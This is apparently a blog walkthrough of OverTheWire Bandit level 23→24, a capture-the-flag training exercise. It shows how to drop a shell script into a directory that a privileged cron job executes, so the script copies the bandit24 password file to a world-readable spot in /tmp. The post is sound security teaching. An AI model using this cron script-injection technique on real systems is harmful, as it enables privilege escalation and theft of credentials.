← Back to Home

OverTheWire Bandit: Level 23 → Level 24

Technical Note

Context

Another Cron job, but this one is much more interesting. If you check /etc/cron.d/cronjob_bandit24, you’ll see it runs /usr/bin/cronjob_bandit24.sh.

If you read that script (cat ...), you’ll notice something critical: It executes every file inside /var/spool/bandit24/foo and then deletes them.

This means: If we put a script there, the system (with bandit24 privileges) will execute it!

Goal

Write a script that reads the bandit24 password and copies it to a location we can access (e.g., inside /tmp), then inject it into the Cron directory.

Solution

Step 1: Create a Workspace

Let’s make a directory for ourselves to keep things organized:

mkdir -p /tmp/myscript
chmod 777 /tmp/myscript
cd /tmp/myscript

Important: We give 777 permissions to the folder so that user bandit24 can write files into it. Otherwise, it will fail with “Permission denied”.

Step 2: Write the Script

Create a file named task.sh and define what we want the system to do:

nano task.sh

Script Content:

Note: Nano might show an error saying “Unable to create directory … No such file or directory” when starting. This is harmless. Ignore it and start typing.

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/myscript/pass.txt
chmod 666 /tmp/myscript/pass.txt

(Note: I added chmod 666 to ensure the output file is readable by everyone)

Save and exit (Ctrl+O, Enter, Ctrl+X).

Step 3: Set Permissions

The script must be executable:

chmod 777 task.sh

Step 4: Inject the Script

Copy your script to the directory watched by Cron:

cp task.sh /var/spool/bandit24/foo/

Step 5: Wait and Profit

The Cron job runs every minute. Wait up to 60 seconds. Then check for your output file:

cat /tmp/myscript/pass.txt

Congratulations! You’ve successfully performed a privilege escalation via script injection.

Key Takeaways

  1. Shell Scripting: Text files starting with #!/bin/bash that execute commands sequentially.
  2. Write Permissions: Any location where you can write files is a potential vector for Remote Code Execution if a privileged process reads/executes files from there.
  3. Cleanup: Scripts might be deleted after execution. Always keep a copy of your work.
← Previous Post
OverTheWire Bandit: Level 22 → Level 23
Next Post →
OverTheWire Bandit: Level 24 → Level 25